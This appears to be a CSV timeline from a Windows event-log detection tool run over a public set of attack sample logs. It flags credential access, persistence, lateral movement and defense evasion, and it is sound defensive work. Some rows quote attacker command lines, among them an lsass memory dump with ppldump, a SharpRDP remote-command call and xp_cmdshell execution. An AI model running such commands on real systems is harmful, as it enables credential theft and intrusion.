2019-09-03 20:34:37.129 +09:00,MSEDGEWIN10,3,info,,Network Connection,tcp | Src: 127.0.0.1:49950 (MSEDGEWIN10) | Dst: 127.0.0.1:445 (MSEDGEWIN10) | User: IIS APPPOOL\DefaultAppPool | Process: C:\Windows\System32\inetsrv\w3wp.exe | PID: 8892 | PGUID: 747F3D96-4F81-5D6E-0000-001001818B00,rules/hayabusa/sysmon/events/3_NetworkConnection.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Command and Control/tunna_iis_rdp_smb_tunneling_sysmon_3.evtx
2019-09-03 20:34:37.129 +09:00,MSEDGEWIN10,3,info,,Network Connection,tcp | Src: 127.0.0.1:445 (MSEDGEWIN10) | Dst: 127.0.0.1:49950 (MSEDGEWIN10) | User: NT AUTHORITY\SYSTEM | Process: System | PID: 4 | PGUID: 747F3D96-986D-5D6E-0000-0010EB030000,rules/hayabusa/sysmon/events/3_NetworkConnection.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Command and Control/tunna_iis_rdp_smb_tunneling_sysmon_3.evtx
2019-09-03 20:36:26.005 +09:00,MSEDGEWIN10,3,info,,Network Connection,udp | Src: 10.0.2.15:137 (MSEDGEWIN10) | Dst: 10.255.255.255:137 () | User: NT AUTHORITY\SYSTEM | Process: System | PID: 4 | PGUID: 747F3D96-986D-5D6E-0000-0010EB030000,rules/hayabusa/sysmon/events/3_NetworkConnection.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Command and Control/tunna_iis_rdp_smb_tunneling_sysmon_3.evtx
2019-09-03 20:36:26.005 +09:00,MSEDGEWIN10,3,info,,Network Connection,udp | Src: 10.255.255.255:137 () | Dst: 10.0.2.15:137 (MSEDGEWIN10) | User: NT AUTHORITY\SYSTEM | Process: System | PID: 4 | PGUID: 747F3D96-986D-5D6E-0000-0010EB030000,rules/hayabusa/sysmon/events/3_NetworkConnection.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Command and Control/tunna_iis_rdp_smb_tunneling_sysmon_3.evtx
2019-09-06 22:49:35.433 +09:00,MSEDGEWIN10,17,medium,,Pipe Created_Sysmon Alert,CredAccess - Keko default np | Pipe: \kekeo_tsssp_endpoint | Process: c:\Users\IEUser\Desktop\kekeo.exe | PID: 6908 | PGUID: 747F3D96-393E-5D72-0000-0010AD443200,rules/hayabusa/sysmon/alerts/17_PipeCreated_SysmonAlert.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Credential Access/sysmon17_18_kekeo_tsssp_default_np.evtx
2019-09-06 22:49:39.823 +09:00,MSEDGEWIN10,18,medium,,Pipe Connected_Sysmon Alert,CredAccess - Keko default np | Pipe: \kekeo_tsssp_endpoint | Process: C:\Users\IEUser\Desktop\kekeo.exe | PID: 7808 | PGUID: 747F3D96-3944-5D72-0000-001019773200,rules/hayabusa/sysmon/alerts/18_PipeConnected_SysmonAlert.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Credential Access/sysmon17_18_kekeo_tsssp_default_np.evtx
2019-09-06 23:58:44.918 +09:00,MSEDGEWIN10,18,info,,Pipe Connected,\srvsvc | Process: C:\Windows\system32\wbem\wmiprvse.exe | PID: 3128 | PGUID: 747F3D96-7424-5D72-0000-0010BEFBBC00,rules/hayabusa/sysmon/events/18_PipeConnected.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Credential Access/sysmon17_18_kekeo_tsssp_default_np.evtx
2019-09-09 04:14:54.471 +09:00,MSEDGEWIN10,13,medium,,Registry Key Value Set_Sysmon Alert,Guest RID Hijack | SetValue: HKLM\SAM\SAM\Domains\Account\Users\000001F5\F: Binary Data | Process: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe | PID: 7680 | PGUID: 747F3D96-067D-5D75-0000-001007745500,rules/hayabusa/sysmon/alerts/13_RegistryKeyValueSet_SysmonAlert.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persist_valid_account_guest_rid_hijack.evtx
2019-09-09 04:17:44.249 +09:00,MSEDGEWIN10,13,low,ResDev,Usage of Sysinternals Tools,,rules/sigma/registry_event/registry_event_sysinternals_eula_accepted.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persist_valid_account_guest_rid_hijack.evtx
2019-09-09 22:35:09.315 +09:00,MSEDGEWIN10,4104,high,CredAccess | Exec,PowerShell Credential Prompt,,rules/sigma/powershell/powershell_script/posh_ps_prompt_credentials.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Credential Access/phish_windows_credentials_powershell_scriptblockLog_4104.evtx
2019-09-09 22:35:09.315 +09:00,MSEDGEWIN10,4104,medium,Persis,Manipulation of User Computer or Group Security Principals Across AD,,rules/sigma/powershell/powershell_script/posh_ps_directoryservices_accountmanagement.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Credential Access/phish_windows_credentials_powershell_scriptblockLog_4104.evtx
2019-09-22 20:22:05.201 +09:00,MSEDGEWIN10,4732,high,Persis,User Added To Local Administrators Group,SID: S-1-5-21-3461203602-4096304019-2269080069-501 | Group: Administrators | LID: 0x27a10f,rules/hayabusa/default/alerts/Security/4732-AccountManipulation_UserAddedToLocalAdministratorsGroup.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/Network_Service_Guest_added_to_admins_4732.evtx
2019-09-22 20:23:19.251 +09:00,MSEDGEWIN10,4732,high,Persis,User Added To Local Administrators Group,SID: S-1-5-20 | Group: Administrators | LID: 0x27a10f,rules/hayabusa/default/alerts/Security/4732-AccountManipulation_UserAddedToLocalAdministratorsGroup.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/Network_Service_Guest_added_to_admins_4732.evtx
2019-11-03 22:51:58.263 +09:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: ""C:\Windows\system32\cmd.exe"" /c set > c:\users\\public\netstat.txt | Process: C:\Windows\System32\cmd.exe | User: MSEDGEWIN10\sqlsvc | Parent Cmd: ""c:\Program Files\Microsoft SQL Server\MSSQL10.SQLEXPRESS\MSSQL\Binn\sqlservr.exe"" -sSQLEXPRESS | LID: 0x1d51e | PID: 5004 | PGUID: 747F3D96-DB7C-5DBE-0000-0010CF6B9502",rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/sysmon_1_exec_via_sql_xpcmdshell.evtx
2019-11-03 22:51:58.263 +09:00,MSEDGEWIN10,1,critical,InitAccess | Persis | PrivEsc,Suspicious Shells Spawn by SQL Server,,rules/sigma/process_creation/proc_creation_win_susp_shell_spawn_from_mssql.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/sysmon_1_exec_via_sql_xpcmdshell.evtx
2019-11-03 22:51:58.263 +09:00,MSEDGEWIN10,1,low,Evas,Cmd Stream Redirection,,rules/sigma/process_creation/proc_creation_win_redirect_to_stream.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/sysmon_1_exec_via_sql_xpcmdshell.evtx
2019-11-03 22:51:58.263 +09:00,MSEDGEWIN10,1,low,Disc,Redirect Output in CommandLine,,rules/sigma/process_creation/proc_creation_win_cmd_redirect.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/sysmon_1_exec_via_sql_xpcmdshell.evtx
2019-11-03 22:51:58.263 +09:00,MSEDGEWIN10,1,low,Disc,Suspicious Listing of Network Connections,,rules/sigma/process_creation/proc_creation_win_susp_network_listing_connections.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/sysmon_1_exec_via_sql_xpcmdshell.evtx
2019-11-15 17:19:02.298 +09:00,alice.insecurebank.local,1102,high,Evas,Security Log Cleared,User: bob,rules/hayabusa/default/alerts/Security/1102_IndicatorRemovalOnHost-ClearWindowsEventLogs_SecurityLogCleared.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/4624 LT3 AnonymousLogon Localhost - JuicyPotato.evtx
2019-11-15 17:19:17.134 +09:00,alice.insecurebank.local,4634,info,,Logoff,User: ANONYMOUS LOGON | LID: 0x1d12916,rules/hayabusa/default/events/Security/Logons/4634_Logoff.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/4624 LT3 AnonymousLogon Localhost - JuicyPotato.evtx
2020-01-15 05:44:50.353 +09:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: rundll32 url.dll,FileProtocolHandler ms-browser:// | Process: C:\Windows\System32\rundll32.exe | User: MSEDGEWIN10\IEUser | Parent Cmd: C:\Windows\system32\wbem\wmiprvse.exe -secured -Embedding | LID: 0x7a3aff | PID: 4180 | PGUID: 747F3D96-2842-5E1E-0000-00100C417A00",rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_wmi_PoisonHandler_Mr-Un1k0d3r_sysmon_1_13.evtx
2020-01-15 05:44:50.353 +09:00,MSEDGEWIN10,1,high,Exec,Wmiprvse Spawning Process,,rules/sigma/process_creation/proc_creation_win_wmiprvse_spawning_process.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_wmi_PoisonHandler_Mr-Un1k0d3r_sysmon_1_13.evtx
2020-01-15 05:44:50.353 +09:00,MSEDGEWIN10,1,medium,Evas,Suspicious Rundll32 Activity,,rules/sigma/process_creation/proc_creation_win_susp_rundll32_activity.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_wmi_PoisonHandler_Mr-Un1k0d3r_sysmon_1_13.evtx
2020-01-15 05:44:51.016 +09:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: ""cmd.exe"" /c notepad.exe | Process: C:\Windows\System32\cmd.exe | User: MSEDGEWIN10\IEUser | Parent Cmd: rundll32 url.dll,FileProtocolHandler ms-browser:// | LID: 0x7a3aff | PID: 1568 | PGUID: 747F3D96-2842-5E1E-0000-0010745E7A00",rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_wmi_PoisonHandler_Mr-Un1k0d3r_sysmon_1_13.evtx
2020-01-15 05:44:51.122 +09:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: notepad.exe | Process: C:\Windows\System32\notepad.exe | User: MSEDGEWIN10\IEUser | Parent Cmd: ""cmd.exe"" /c notepad.exe | LID: 0x7a3aff | PID: 676 | PGUID: 747F3D96-2843-5E1E-0000-0010B1687A00",rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_wmi_PoisonHandler_Mr-Un1k0d3r_sysmon_1_13.evtx
2020-01-15 05:46:43.237 +09:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: rundll32 url.dll,OpenURL ms-browser:// | Process: C:\Windows\System32\rundll32.exe | User: MSEDGEWIN10\IEUser | Parent Cmd: C:\Windows\system32\wbem\wmiprvse.exe -secured -Embedding | LID: 0x7beb57 | PID: 3412 | PGUID: 747F3D96-28B3-5E1E-0000-00101DF17B00",rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_wmi_PoisonHandler_Mr-Un1k0d3r_sysmon_1_13.evtx
2020-01-15 05:46:43.237 +09:00,MSEDGEWIN10,1,high,Exec,Wmiprvse Spawning Process,,rules/sigma/process_creation/proc_creation_win_wmiprvse_spawning_process.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_wmi_PoisonHandler_Mr-Un1k0d3r_sysmon_1_13.evtx
2020-01-15 05:46:43.237 +09:00,MSEDGEWIN10,1,medium,Evas,Suspicious Rundll32 Activity,,rules/sigma/process_creation/proc_creation_win_susp_rundll32_activity.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_wmi_PoisonHandler_Mr-Un1k0d3r_sysmon_1_13.evtx
2020-01-15 05:46:43.819 +09:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: ""cmd.exe"" /c notepad.exe | Process: C:\Windows\System32\cmd.exe | User: MSEDGEWIN10\IEUser | Parent Cmd: rundll32 url.dll,OpenURL ms-browser:// | LID: 0x7beb57 | PID: 1656 | PGUID: 747F3D96-28B3-5E1E-0000-001032047C00",rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_wmi_PoisonHandler_Mr-Un1k0d3r_sysmon_1_13.evtx
2020-01-15 05:46:43.836 +09:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: notepad.exe | Process: C:\Windows\System32\notepad.exe | User: MSEDGEWIN10\IEUser | Parent Cmd: ""cmd.exe"" /c notepad.exe | LID: 0x7beb57 | PID: 2964 | PGUID: 747F3D96-28B3-5E1E-0000-0010900A7C00",rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_wmi_PoisonHandler_Mr-Un1k0d3r_sysmon_1_13.evtx
2020-01-15 05:48:17.044 +09:00,MSEDGEWIN10,1,info,,Process Created,Cmd: cmd.exe /c start ms-browser:// | Process: C:\Windows\System32\cmd.exe | User: MSEDGEWIN10\IEUser | Parent Cmd: C:\Windows\system32\wbem\wmiprvse.exe -secured -Embedding | LID: 0x7cef82 | PID: 4448 | PGUID: 747F3D96-2910-5E1E-0000-001053F57C00,rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_wmi_PoisonHandler_Mr-Un1k0d3r_sysmon_1_13.evtx
2020-01-15 05:48:17.044 +09:00,MSEDGEWIN10,1,high,Exec,Wmiprvse Spawning Process,,rules/sigma/process_creation/proc_creation_win_wmiprvse_spawning_process.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_wmi_PoisonHandler_Mr-Un1k0d3r_sysmon_1_13.evtx
2020-01-15 05:48:17.412 +09:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: ""cmd.exe"" /c notepad.exe | Process: C:\Windows\System32\cmd.exe | User: MSEDGEWIN10\IEUser | Parent Cmd: cmd.exe /c start ms-browser:// | LID: 0x7cef82 | PID: 2416 | PGUID: 747F3D96-2911-5E1E-0000-0010D80A7D00",rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_wmi_PoisonHandler_Mr-Un1k0d3r_sysmon_1_13.evtx
2020-01-15 05:48:17.447 +09:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: notepad.exe | Process: C:\Windows\System32\notepad.exe | User: MSEDGEWIN10\IEUser | Parent Cmd: ""cmd.exe"" /c notepad.exe | LID: 0x7cef82 | PID: 1344 | PGUID: 747F3D96-2911-5E1E-0000-00109C137D00",rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_wmi_PoisonHandler_Mr-Un1k0d3r_sysmon_1_13.evtx
2020-01-15 05:48:45.243 +09:00,MSEDGEWIN10,1,info,,Process Created,Cmd: explorer ms-browser:// | Process: C:\Windows\explorer.exe | User: MSEDGEWIN10\IEUser | Parent Cmd: C:\Windows\system32\wbem\wmiprvse.exe -secured -Embedding | LID: 0x7d58cd | PID: 3828 | PGUID: 747F3D96-292D-5E1E-0000-0010F5597D00,rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_wmi_PoisonHandler_Mr-Un1k0d3r_sysmon_1_13.evtx
2020-01-15 05:48:45.243 +09:00,MSEDGEWIN10,1,high,Exec,Wmiprvse Spawning Process,,rules/sigma/process_creation/proc_creation_win_wmiprvse_spawning_process.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_wmi_PoisonHandler_Mr-Un1k0d3r_sysmon_1_13.evtx
2020-01-15 05:48:45.293 +09:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: C:\Windows\explorer.exe /factory,{75dff2b7-6936-4c06-a8bb-676a7b00b24b} -Embedding | Process: C:\Windows\explorer.exe | User: MSEDGEWIN10\IEUser | Parent Cmd: ? | LID: 0x565a6 | PID: 6020 | PGUID: 747F3D96-292D-5E1E-0000-001025607D00",rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_wmi_PoisonHandler_Mr-Un1k0d3r_sysmon_1_13.evtx
2020-01-24 04:09:34.052 +09:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: SharpRDP.exe computername=192.168.56.1 command=""C:\Temp\file.exe"" username=domain\user password=password | Process: C:\ProgramData\USOShared\SharpRDP.exe | User: MSEDGEWIN10\IEUser | Parent Cmd: ""C:\Windows\System32\cmd.exe"" | LID: 0xd50da8 | PID: 5484 | PGUID: 747F3D96-EF6D-5E29-0000-0010A243F100",rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/sharprdp_sysmon_7_mstscax.dll.evtx
2020-01-24 04:09:34.657 +09:00,MSEDGEWIN10,7,low,,Image Loaded_Sysmon Alert,"Execution - Image Loaded from suspicious path | Image: C:\ProgramData\USOShared\AxInterop.MSTSCLib.dll | Process: C:\ProgramData\USOShared\SharpRDP.exe | Company: ? | Signed: false | Signature: Unavailable | PID: 5484 | PGUID: 747F3D96-EF6D-5E29-0000-0010A243F100 | Hash: SHA1=7E613165F4E4696AB13D8D5F3F889131EBC186E0,MD5=A482BE452F384E446FD9F3A91986FCD4,SHA256=9DDAE70F550B452ABE3C75A6036845ABD4134F858C1DEC3343762D97A9CF8450,IMPHASH=DAE02F32A21E03CE65412F6E56942DAA",rules/hayabusa/sysmon/alerts/7_ImageLoaded_SysmonAlert.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/sharprdp_sysmon_7_mstscax.dll.evtx
2020-01-24 04:09:34.657 +09:00,MSEDGEWIN10,7,low,,Image Loaded_Sysmon Alert,"Execution - Image Loaded from suspicious path | Image: C:\ProgramData\USOShared\AxInterop.MSTSCLib.dll | Process: C:\ProgramData\USOShared\SharpRDP.exe | Company: ? | Signed: false | Signature: Unavailable | PID: 5484 | PGUID: 747F3D96-EF6D-5E29-0000-0010A243F100 | Hash: SHA1=7E613165F4E4696AB13D8D5F3F889131EBC186E0,MD5=A482BE452F384E446FD9F3A91986FCD4,SHA256=9DDAE70F550B452ABE3C75A6036845ABD4134F858C1DEC3343762D97A9CF8450,IMPHASH=DAE02F32A21E03CE65412F6E56942DAA",rules/hayabusa/sysmon/alerts/7_ImageLoaded_SysmonAlert.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/sharprdp_sysmon_7_mstscax.dll.evtx
2020-01-24 04:09:34.660 +09:00,MSEDGEWIN10,7,low,,Image Loaded_Sysmon Alert,"LM - suspicious RDP Client | Image: C:\Windows\SysWOW64\mstscax.dll | Process: C:\ProgramData\USOShared\SharpRDP.exe | Company: Microsoft Corporation | Signed: true | Signature: Valid | PID: 5484 | PGUID: 747F3D96-EF6D-5E29-0000-0010A243F100 | Hash: SHA1=359B2E4C537B00DD450D1E7B3465EE1BA094E8D6,MD5=654534BAC7465961F302C7A990DFDC8D,SHA256=D9827ABED81572C296BB6A63863515BA7B9EB1C8164A4E92A97E1FF0BD04AAB1,IMPHASH=1EA1D2F3BE5D1C352344C4CBF6A7614C",rules/hayabusa/sysmon/alerts/7_ImageLoaded_SysmonAlert.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/sharprdp_sysmon_7_mstscax.dll.evtx
2020-02-10 17:28:12.856 +09:00,MSEDGEWIN10,1,high,,Process Created_Sysmon Alert,"suspicious execution path | Cmd: Furutaka.exe dummy2.sys | Process: C:\Users\Public\BYOV\TDL\Furutaka.exe | User: MSEDGEWIN10\IEUser | Parent Cmd: ""C:\Windows\system32\cmd.exe"" | LID: 0x31a17 | PID: 3768 | PGUID: 747F3D96-141C-5E41-0000-0010788B1E00 | Hash: SHA1=68B26C16080D71013123C6DEE7B1AABC3D2857D0,MD5=B1B981CD8B111783B80F3C4E10086912,SHA256=37805CC7AE226647753ACA1A32D7106D804556A98E1A21AC324E5B880B9A04DA,IMPHASH=114E27FBB0E975697F2F9988DE884FA7",rules/hayabusa/sysmon/alerts/1_ProcessCreated_SysmonAlert.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/DSE_bypass_BYOV_TDL_dummydriver_sysmon_6_7_13.evtx
2020-02-10 17:28:12.856 +09:00,MSEDGEWIN10,1,high,Evas,Execution from Suspicious Folder,,rules/sigma/process_creation/proc_creation_win_susp_execution_path.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/DSE_bypass_BYOV_TDL_dummydriver_sysmon_6_7_13.evtx
2020-02-10 17:28:12.876 +09:00,MSEDGEWIN10,11,info,,File Created,Path: C:\Windows\System32\drivers\VBoxDrv.sys | Process: c:\Users\Public\BYOV\TDL\Furutaka.exe | PID: 3768 | PGUID: 747F3D96-141C-5E41-0000-0010788B1E00,rules/hayabusa/sysmon/events/11_FileCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/DSE_bypass_BYOV_TDL_dummydriver_sysmon_6_7_13.evtx
2020-02-10 17:28:12.981 +09:00,MSEDGEWIN10,6,medium,Evas,Driver Loaded_Unsigned,"Path: C:\Windows\System32\drivers\VBoxDrv.sys | Status: Valid | Hash: SHA1=7C1B25518DEE1E30B5A6EAA1EA8E4A3780C24D0C,MD5=EAEA9CCB40C82AF8F3867CD0F4DD5E9D,SHA256=CF3A7D4285D65BF8688215407BCE1B51D7C6B22497F09021F0FCE31CBEB78986,IMPHASH=B262E8D078EDE007EBD0AA71B9152863",rules/hayabusa/sysmon/alerts/6_DriverLoaded_Unsigned.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/DSE_bypass_BYOV_TDL_dummydriver_sysmon_6_7_13.evtx
2020-02-10 17:28:12.981 +09:00,MSEDGEWIN10,6,info,,Signed Driver Loaded,Path: C:\Windows\System32\drivers\VBoxDrv.sys | Signature: innotek GmbH,rules/hayabusa/sysmon/events/6_DriverLoaded_Signed.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/DSE_bypass_BYOV_TDL_dummydriver_sysmon_6_7_13.evtx
2020-02-10 17:28:13.098 +09:00,MSEDGEWIN10,5,info,,Process Terminated,Process: C:\Users\Public\BYOV\TDL\Furutaka.exe | PID: 3768 | PGUID: 747F3D96-141C-5E41-0000-0010788B1E00,rules/hayabusa/sysmon/events/5_ProcessTerminated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/DSE_bypass_BYOV_TDL_dummydriver_sysmon_6_7_13.evtx
2020-02-10 17:28:13.147 +09:00,MSEDGEWIN10,7,low,,Image Loaded_Sysmon Alert,"Supicious image loaded - ntoskrnl | Image: C:\Windows\System32\ntoskrnl.exe | Process: C:\Users\Public\BYOV\TDL\Furutaka.exe | Company: Microsoft Corporation | Signed: true | Signature: Valid | PID: 3768 | PGUID: 747F3D96-141C-5E41-0000-0010788B1E00 | Hash: SHA1=667AFD98C8BAA2CF95C9EE087CB36A0F6508A942,MD5=0EED97AD8D855B5EDF948A7866D5F874,SHA256=C36A8FAC48690632731D56747CBBDCE2453D3E5303A73896505D495F7678DFF0,IMPHASH=4D717BA02FC8AA76777B033C52AA4694",rules/hayabusa/sysmon/alerts/7_ImageLoaded_SysmonAlert.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/DSE_bypass_BYOV_TDL_dummydriver_sysmon_6_7_13.evtx
2020-02-10 19:08:24.535 +09:00,MSEDGEWIN10,1,high,,Process Created_Sysmon Alert,"suspicious execution path | Cmd: ppldump.exe -p lsass.exe -o a.png | Process: C:\Users\Public\BYOV\ZAM64\ppldump.exe | User: MSEDGEWIN10\IEUser | Parent Cmd: ""C:\Windows\system32\cmd.exe"" | LID: 0x97734 | PID: 5016 | PGUID: 747F3D96-2B98-5E41-0000-00109C904700 | Hash: SHA1=C8BBBB2554D7C1F29B8670A14BE4E52D7AF81A24,MD5=DD7D6D8101A6412ABFA7B55F10E1D31B,SHA256=70908F9BBC59198FEBE0D1CA0E34A9E79C68F5053A39A0BA0C6F6CEC9ED1A875,IMPHASH=0EFF65F1D3AC0A58787724FB03E2D1BC",rules/hayabusa/sysmon/alerts/1_ProcessCreated_SysmonAlert.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/DE_BYOV_Zam64_CA_Memdump_sysmon_7_10.evtx
2020-02-10 19:08:24.535 +09:00,MSEDGEWIN10,1,high,Evas,Execution from Suspicious Folder,,rules/sigma/process_creation/proc_creation_win_susp_execution_path.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/DE_BYOV_Zam64_CA_Memdump_sysmon_7_10.evtx
2020-02-10 19:08:24.666 +09:00,MSEDGEWIN10,10,low,,Process Access,Src Process: c:\Users\Public\BYOV\ZAM64\ppldump.exe | Tgt Process: C:\Windows\system32\lsass.exe | Src User: %SourceUser% | Tgt User: %TargetUser% | Access: 0x1fffff | Src PID: 5016 | Src PGUID: 747F3D96-2B98-5E41-0000-00109C904700 | Tgt PID: 624 | Tgt PGUID: 747F3D96-A042-5E41-0000-0010E4560000,rules/hayabusa/sysmon/events/10_ProcessAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/DE_BYOV_Zam64_CA_Memdump_sysmon_7_10.evtx
2020-02-10 19:08:24.666 +09:00,MSEDGEWIN10,10,high,CredAccess,LSASS Memory Access by Tool Named Dump,,rules/sigma/process_access/sysmon_lsass_memdump_indicators.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/DE_BYOV_Zam64_CA_Memdump_sysmon_7_10.evtx
2020-02-10 19:08:24.666 +09:00,MSEDGEWIN10,10,high,CredAccess,LSASS Access from Program in Suspicious Folder,,rules/sigma/process_access/win_susp_proc_access_lsass_susp_source.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/DE_BYOV_Zam64_CA_Memdump_sysmon_7_10.evtx
2020-02-10 19:08:25.164 +09:00,MSEDGEWIN10,7,low,,Image Loaded_Sysmon Alert,"Suspicious ImageLoad - Possible Memdump | Image: C:\Windows\System32\dbgcore.dll | Process: C:\Windows\System32\lsass.exe | Company: Microsoft Corporation | Signed: true | Signature: Valid | PID: 624 | PGUID: 747F3D96-A042-5E41-0000-0010E4560000 | Hash: SHA1=E3FA87C983008D4D2A5D31708415F88548FC7702,MD5=88E88D8C1C663769BDD722000A7EB5A7,SHA256=C84BECA73EA45D3C53D9C42CD6A37CC0CC07FF57D9CFEE113CDF70F640572AEF,IMPHASH=9D75F08EA29885182B136CE4FF854114",rules/hayabusa/sysmon/alerts/7_ImageLoaded_SysmonAlert.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/DE_BYOV_Zam64_CA_Memdump_sysmon_7_10.evtx
2020-02-10 19:08:25.193 +09:00,MSEDGEWIN10,7,low,,Image Loaded_Sysmon Alert,"Suspicious ImageLoad - Possible Memdump | Image: C:\Windows\System32\dbghelp.dll | Process: C:\Windows\System32\lsass.exe | Company: Microsoft Corporation | Signed: true | Signature: Valid | PID: 624 | PGUID: 747F3D96-A042-5E41-0000-0010E4560000 | Hash: SHA1=8B5BC2EAA00C530DF0FF139635E428FA4C5D7AA8,MD5=B0A68C5BB8D5493F1AF967F0FDD80382,SHA256=2CF0972DC8A67D863AD1A6205B66C80865ACC11F7E3F67B4A76C162655EE0FEE,IMPHASH=AB902346D2BD8706EE70C87E00136BAC",rules/hayabusa/sysmon/alerts/7_ImageLoaded_SysmonAlert.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/DE_BYOV_Zam64_CA_Memdump_sysmon_7_10.evtx
2020-02-10 19:08:25.193 +09:00,MSEDGEWIN10,7,low,,Image Loaded_Sysmon Alert,"Suspicious ImageLoad - Possible Memdump | Image: C:\Windows\System32\dbghelp.dll | Process: C:\Windows\System32\lsass.exe | Company: Microsoft Corporation | Signed: true | Signature: Valid | PID: 624 | PGUID: 747F3D96-A042-5E41-0000-0010E4560000 | Hash: SHA1=8B5BC2EAA00C530DF0FF139635E428FA4C5D7AA8,MD5=B0A68C5BB8D5493F1AF967F0FDD80382,SHA256=2CF0972DC8A67D863AD1A6205B66C80865ACC11F7E3F67B4A76C162655EE0FEE,IMPHASH=AB902346D2BD8706EE70C87E00136BAC",rules/hayabusa/sysmon/alerts/7_ImageLoaded_SysmonAlert.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/DE_BYOV_Zam64_CA_Memdump_sysmon_7_10.evtx
